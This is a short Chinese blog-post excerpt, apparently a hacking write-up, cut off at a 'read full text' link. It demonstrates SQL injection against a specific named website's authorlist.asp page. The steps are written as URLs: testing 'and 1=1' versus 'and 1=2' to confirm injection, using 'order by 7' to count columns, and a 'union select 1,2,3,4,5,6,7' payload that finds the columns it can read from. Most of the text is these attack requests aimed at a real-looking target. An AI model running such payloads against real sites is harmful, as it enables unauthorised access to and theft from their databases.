小宝哥哥

摘要： 注入点:http://www.romance-sky.com/authorlist.asp?id=227分析:and1=1正常and1=2出错.存在注入漏洞字段数目判断:http://www.romance-sky.com/authorlist.asp?id=227orderby7正常.表示字段数为7http://www.romance-sky.com/authorlist.asp?id=227and1=2unionselect1,2,3,4,5,6,7from表名返回2,4(字符型),5(字符型)处可以利用.http://www.romance-sky.com/authorlist.asp? 阅读全文